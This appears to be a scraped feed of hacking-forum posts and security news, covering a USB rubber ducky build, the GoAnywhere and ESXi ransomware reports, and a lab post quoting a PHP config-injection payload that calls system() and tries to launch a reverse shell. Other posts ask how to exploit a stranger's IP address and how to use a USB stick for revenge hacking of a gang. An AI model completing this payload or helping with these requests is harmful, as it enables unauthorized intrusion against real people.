i want to make a rubber ducky

I am little bit confused that between raspberry pi pico, atmega32u4 and attiny85 which one should I use to make a usb rubber ducky ? Between raspberry pi pico, atmega32u4 and attiny85 which one will be a better choice ? submitted by /u/an…

GoAnywhere MFT zero-day flaw actively exploited

Threat actors are actively exploiting a zero-day vulnerability affecting Fortra’s GoAnywhere MFT managed file transfer application. Experts warn that threat actors are actively exploiting a zero-day vulnerability in Fortra’s GoAnywhere MFT managed file transfer application. The popular investigator Brian Krebs first revealed details about the zero-day on Mastodon and pointed out that Fortra has yet […]

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How do I add a PHP script to a python exploit?

I’m trying to use [this exploit](https://www.exploit-db.com/exploits/44374) on a box from vulnhub, but the part I can’t figure out is in the exploit where it says:

#the payload will be injected into the configuration file via this code

#’ define(\’DB_DATABASE\’, \” . trim($HTTP_POST_VARS[‘DB_DATABASE’]) . ‘\’);’ . “\n” .

#so the format for the exploit will be: ‘); PAYLOAD; /*

payload = ‘\’);’

payload += ‘system(“ls”);’ # this is where you enter you PHP payload

payload += ‘/*’

data[‘DB_DATABASE’] = payload

So how do I actually enter the PHP payload? I’m trying to use the PHP reverse shell from Pentest Monkey that comes with Kali. I tried copy pasting and

payload += ‘system(“php /path/to/php_reverse_shell.php”);’

Thanks guys.

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Ip adress

I got the Ip of some troll online and I am wondering if there is something more I can do with it apart from knowing his location? submitted by /u/ElderberryInformal66 [link] [comments]

CERT-FR warns of a new wave of ransomware attacks targeting VMware ESXi servers

A new wave of ransomware attacks is targeting VMware ESXi servers to deliver ransomware, CERT of France warns. The French Computer Emergency Response Team (CERT-FR) warns that threat actors are targeting VMware ESXi servers to deploy ransomware. CERT-FR reported that threat actors behind these ransomware attackers are actively exploiting the vulnerability CVE-2021-21974. “OpenSLP as used […]

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Revenge on local gang

Long story short I want revenge on this gang for something they did to some family members they asked me to put some videos on a usb for them how can I use this to my advantage and gain access to their shit undetected with the USB I have Kali Linux but haven’t used it yet Need help please

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Friend being blackmailed.

Context : My friend(girl) used to text this guy long ago and had sent some suggestive pics(disappearing photo option in instagram). she quit talking with him after a while due to him being a psycho. Anyway, a few days ago, that guy is claiming he has a…